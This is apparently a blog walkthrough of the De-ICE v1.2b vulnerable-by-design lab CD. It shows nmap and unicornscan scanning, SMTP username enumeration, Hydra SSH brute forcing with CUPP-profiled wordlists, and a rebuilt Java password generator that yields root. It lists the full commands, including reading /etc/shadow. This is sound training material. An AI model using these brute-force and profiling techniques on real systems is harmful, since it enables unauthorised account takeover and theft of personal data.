De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}

The "vulnerable-by-design" series De-ICE, has released another challenge. However, it's in two different parts - which makes the naming more confusing! This is De-ICE level 1-disk 3, the second half, and it should not be confused with "version a" (de-ice-1.120-1.0a.iso aka Level 1-Disk 3-Release 1-Version A), as these are NOT the same challenge - it's a completely independent challenge.

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/De-ICE_v1.2b_(1.120).mp4

Timeline

The students of "HackingDojo" produced their own exploitable LiveCD which was released under the de-ice name. This is it. To date all of Heorot.net releases (in date order) are as follows:

• De-ICE - Level 1 - Disk 1 (hxxp://forums.heorot.net/viewtopic.php?f=16&t=13) (de-ice.net-1.100-1.1.iso)
• De-ICE - Level 1 - Disk 2 (hxxp://forums.heorot.net/viewtopic.php?f=16&t=13) (de-ice.net-1.110-1.0.iso)
• De-ICE - Level 2 - Disk 1 (hxxp://forums.heorot.net/viewforum.php?f=18) (de-ice.net-2.100-1.1.iso)
• pWnOS (hxxp://forums.heorot.net/viewtopic.php?f=21&t=149) (pWnOS v1.0.zip)
• Hackerdemia (hxxp://forums.heorot.net/viewtopic.php?f=42&t=203) (hackerdemia-1.1.0.iso)
• De-ICE - Level 1 - Disk 3 - Version A (hxxp://forums.heorot.net/viewtopic.php?f=16&t=482) (de-ice-1.120-1.0a.iso)
• De-ICE - Level 1 - Disk 3 - Version B (hxxp://forums.heorot.net/viewtopic.php?f=16&t=482) (de-ice-1.120-1.0b.iso)

Method

• Pre-setup (configured IP as the host has a static IP in 192.168.1.0/24 range)
• Scan network for the host (nmap)
• Port scanned host (unicornscan)
• Enumerated running services running open ports (nmap)
• Enumerated possible username(s) (Netcat)
• Brute forced login details (Hydra)
• Profiled other users (CUPP)
• Escalated privilege by re-creating custom encryption program (Java)
• Found the "flag" (a database file)

Tools

• de-ice-1.120-1.0b.iso (MD5: 5AFEA4D036681093408AE493D4BD2672)
• Spare or a Virtual machine (Example: Virtual Box or VMware Player)
• nmap – (Can be found on BackTrack 5).
• unicornscan – (Can be found in BackTrack 5's repository).
• hydra – (Can be found on BackTrack 5).
• Common User Passwords Profiler – (Can be found on BackTrack 5).
• Java compiler – (Can be found on BackTrack 5).

Walkthrough

By doing a quick "ping" scan with nmap, it reveals the live hosts on the network. Once the target has been discovered, a detailed port scan (TCP & UDP) was taken via unicornscan. The results were then checked with another detailed TCP port scan as well as enumerating which services are running by using nmap. Unicornscan is quicker doing a port scan (especially with UDP scanning). However, nmap has the upside of it being able to do more by "information gathering", for example "OS detection", "version detection of services", "a collection of script scanning" and "traceroute details" (by using "-a" option). The attacker also increases the scan speed (by "-T4"). Nmap also confirms TCP port 80 is open, which is being used for a web server (it's also the default port).

The attacker interacts with the web server and is presented with the "Company Portal" page. There is a message explaining that it the web site is "under maintenance", with methods of contact - a telephone number and email address.

The port scan revealed that there was a SMTP service running and decided to attempt to use the email address to identity possible usernames. The first method (VRFY) was disabled, so the attacker proceeds to draft an email. Depending on the recipient's name it will return if the account is valid or not. The attacker then tries different combinations of the given email address (CustomerServiceAdmin@nosecbank.com) until they find its valid login, csadmin.

The attacker then searches for a wordlist to aid them in attempting to brute force the password. (Editor's note: darkc0de.lst does contain the password. however it would of taken a lot longer for it to reach it). The attacker starts hydra attacking the SSH service and waits for it to try every entry in the file. After waiting a couple of minutes (due to the small size of the wordlist) the attacker found the valid password, 'rocker'.

Upon logging into the system remotely, the attacker finds if there are any other valid users in the system (the result is 4). The attacker then continues on by browsing the users (csadmin) personal folder. The attacker soon discovers a personal email conversation between the staff members. These emails contain personal information regarding each user - which is also commonly used as their password.

After building up the profile for each user, the attacker then generates possible passwords using this information, by using CUPP (Common User Passwords Profiler). The attacker enters in the collected information and waits for the possible combinations to be generated. They then repeat the brute force attempt, this time with a specific wordlist, tailor made for that user. This quickly found the user (sdadmin) password (his child's name and year of birth - donovin1998).

The attacker logs in with the new credentials and views his personal files and soon discovers a reply to the email, which contains more personal information regarding another staff member (as well as negative feeling towards them!). The whole process is then repeated again for the new user (dbadmin), who also used personal information for his password (nickname and a few numbers at the end-databaser60).

When the attacker logs in once again, they soon find the first part to an email which has been in every user account so far. Then contents of the email has been "corrupted", however, the header file of the message is still in contact. The subject of the message implies the purpose of it, "New Custom Encryption for Passwords". The attacker then extracts the printable characters, which shows the beginning of the possible source code.

The attacker then builds up the code, from the three found parts so far, which has been written in java and the function of it was the generation function for the new passwords policy. There are comments left in the code, saying it has already been used on two accounts (sysadmin and root). The attacker then fixes, cleans and adds the code (input & conversion functions).

Once the program was complete, the attacker runs it to generate the passwords for sysadmin and the root account. They then test the passwords by logging into the system as sysadmin and then switching to the super user account, root.

The attacker now has access to the complete system...

Game over

...and choose to explore. They find a message, left in the sysadmin home folder, explaining that the user account file has been updated, encrypted and moved. The attacker then locates this file, and by trying all the encryption algorithms with the super user's password, they were able to decrypt the file and view the content in plain text - revealing customers' details, such as names, email addresses, usernames, passwords and more!

Game over...again

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80

ifconfig eth0
ifconfig eth0 192.168.1.192
ifconfig eth0
nmap 192.168.1.* -n -sn -sP
us -H -msf -Iv 192.168.1.20 -p 1-65535 && us -H -mU -Iv 192.168.1.20 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.1.20
firefox 192.168.1.20    # customerserviceadmin@nosecbank.com
nc -v 192.168.1.20 25
HELO attacker
VRFY customerserviceadmin
mail from: attacker@slax.example.net
rcpt to: customerserviceadmin
rcpt to: csadmin
quit
wc -l /pentest/passwords/wordlists/darkc0de.lst
find / -name password.lst
wc -l /opt/framework3/msf3/data/john/wordlists/password.lst
hydra -l csadmin -P /opt/framework3/msf3/data/john/wordlists/password.lst -e ns -f 192.168.1.20 ssh 2>/dev/null | tee /tmp/output
ssh csadmin@192.168.1.20   # rocker
id
cat /etc/passwd   # sysadmin, dbadmin, sdadmin, csadmin
pwd
ls -lah
cd mailserv_download/
ls -lah
cat * | less    # @nosecbank.com, sdadmin (Paul, Donovin, 21 Dec 1998), csadmin (Mark, Andy)
exit
cd /pentest/passwords/cupp/
python cupp.py -i   # Paul, Donovin, 22121998, nosecbank
hydra -l sdadmin -P paul.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output
ssh sdadmin@192.168.1.20   # donovin1998
id
pwd
ls -lah
cd mailserv_download/
ls -lah
cat * | less    # dbadmin (Fred, databaser)
exit
python cupp.py -i   # Fred, databaser, nosecbank
hydra -l dbadmin -P fred.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output
ssh dbadmin@192.168.1.20   # databaser60
id
pwd
ls -lah
cd mailserv_download/
ls -lah
cat * | less   # sysadmin, New Custom Encryption for Passwords
umask 002
strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part1 | cut -f2- |  sed 's/[   ]*//' |  sed -n '/^[0-9]*   /p' > /tmp/output
su csadmin   # rocker
strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part2 | cut -f2- |  sed 's/[   ]*//' |  sed -n '/^[0-9]*   /p' >> /tmp/output
su sdadmin   # donovin1998
strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part3 | cut -f2- |  sed 's/[   ]*//' |  sed -n '/^[0-9]*   /p' >> /tmp/output
cat /tmp/output | sort -g
cat /tmp/output | sort -g | cut -f2-
exit
exit
exit
geany deice.java
less deice.java
javac deice.java
java deice    # sysadmin - 531/\{\{tor/rv/A
java deice    # root - 31/Fwxw 2
ssh sysadmin@192.168.1.20   # 7531/\{\{tor/rv/A
id
su -    # 31/Fwxw 2
id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lAh ~/
pwd
exit
pwd
ls
cat Note_to_self
ls -lAhR /home
cd /home/ftp/incoming/
ls -l
openssl -h
openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw 2"
su -c 'openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw 2"'   # 31/Fwxw 2
ls -l
cat useracc_update.csv

deice.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105

import java.io.*;
//import java.util.Arrays;

public class deice
{
import java.io.*;
//import java.util.Arrays;

public class deice
{
 public static void main(String[] args)
 {
    try
    {
       System.out.println("[>] De-ICE.net v1.2b (1.20b) Password Generator");

       BufferedReader in=new BufferedReader(new InputStreamReader(System.in));
       System.out.print("[?] Username: ");
       String input=in.readLine();

       int[] output=processLoop(input);
       //System.out.println("[+] Output: "+Arrays.toString(output));

       String outputASCII="";
       for(int i=0;i<output.length;i++) outputASCII+=(char) output[i];
       System.out.println("[>] Password: "+outputASCII);

    }
    catch(IOException e)
    {
       System.out.println("[-] IO Error!");
    }
 }

 /*input is username of account*/
 public static int[] processLoop(String input){
    int strL=input.length();
    int lChar=(int)input.charAt(strL-1);
    int fChar=(int)input.charAt(0);
    int[] encArr=new int[strL+2];
    encArr[0]=(int)lChar;

    for(int i=1;i<strL+1;i++) encArr[i]=(int)input.charAt(i-1);

    encArr[encArr.length-1]=(int)fChar;
    encArr=backLoop(encArr);
    encArr=loopBack(encArr);
    encArr=loopProcess(encArr);
    int j=encArr.length-1;

    for(int i=0;i<encArr.length;i++){
       if(i==j) break;
       int t=encArr[i];
       encArr[i]=encArr[j];
       encArr[j]=t;
       j--;
    }
    return encArr;
 }

 /*Note the pseudocode will be implemented with the
 root account and my account, we still need to implement it with the csadmin, sdadmin,
 and dbadmin accounts though*/
 public static int[] backLoop(int[] input){
    int ref=input.length;
    int a=input[1];
    int b=input[ref-1];
    int ch=(a+b)/2;

    for(int i=0;i<ref;i++){
       if(i%2==0) input[i]=(input[i]%ch)+(ref+i);
       else input[i]=(input[i]+ref+i);
    }
    return input;
 }

 public static int[] loopBack(int[] input){
    int ref=input.length/2;
    int[] encNew=new int[input.length+ref];
    int ch=0;

    for(int i=(ref/2);i<input.length;i++){
       encNew[i]=input[ch];
       ch++;
    }

    for(int i=0;i<encNew.length;i++){
       if(encNew[i]<=33) encNew[i]=33+(++ref*2);
       else if(encNew[i]>=126) encNew[i]=126-(--ref*2);
       else{
          if(i%2==0) encNew[i]-=(i%3);
          else encNew[i]+=(i%2);
       }
    }
    return encNew;
 }

 public static int[] loopProcess(int[] input){
    for(int i=0;i<input.length;i++){
       if(input[i]==40||input[i]==41) input[i]+=input.length;
       else if(input[i]==45) input[i]+=20+i;
    }
    return input;
 }
}

Notes

• De-ICE.net v1.2b has a static IP address of 192.168.1.20. )Make sure you're on the same subnet as it!_
• The wordlist used (part of the metasploit framework) to brute force csadmin, might have been updated since - You may have to use another wordlist.
• I made a couple of mistakes in the video (For example: nosec instead of nosecbank) - it's worth checking the commands subsection!

Song: Electronic Sympathies - Shanti & Punk (Radio Edit) - Ferry Corsten

Video length: 10:48

Capture length: 40:01

Blog Post: https://blog.g0tmi1k.com/2011/08/de-icenet-v12b-120b-level-1-disk/